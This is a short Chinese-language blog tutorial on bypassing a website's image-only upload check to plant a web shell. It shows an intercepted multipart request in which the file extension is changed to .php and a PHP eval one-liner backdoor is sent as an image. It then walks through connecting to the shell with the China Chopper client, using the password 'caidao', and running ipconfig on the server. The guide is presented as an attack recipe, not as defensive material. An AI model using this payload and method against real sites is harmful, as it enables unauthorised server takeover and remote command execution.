1. 程式人生 > >如何繞過圖片格式限制上傳木馬獲取WebShell

如何繞過圖片格式限制上傳木馬獲取WebShell

圖片上傳網站木馬教程

思路:

  圖片上傳功能中,前端頁面上傳的是.png格式的圖片檔案,但是抓包Request中修改圖片字尾為.php

可以繞過對上傳檔案格式的限制,檔案的上傳路徑可以在上傳後的頁面或檢視上傳成功後的response中有顯示,

記錄下來後用菜刀連線即可。

(1)網站要求上傳png格式的檔案


(2)儲存-抓包,將檔案字尾.png刪除,剩餘.php檔案繼續提交,提示成功。

Content-Disposition: form-data; name="fun_menu_icon"test123trojan.php-----------------------------1962884403821Content
-Disposition: form-data; name="fun_menu_icon_upload"; filename="test123trojan.php"Content-Type: image/png<?php @eval($_POST['caidao']); ?> -----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_img"test123trojan.php-----------------------------1962884403821Content
-Disposition: form-data; name="fun_menu_img_upload"; filename="test123trojan.php"Content-Type: image/png<?php @eval($_POST['caidao']); ?>

(3)在原始資料提交頁面或提交資料後response頁面中查詢上傳路徑並記錄


(4)開啟最新版中國菜刀,新增已經記錄的路徑,新增密碼caidao



(5)連線虛擬終端,輸入ipconfig

     木馬成功上傳並執行。

                                                      喜歡我的關注,更多資源分享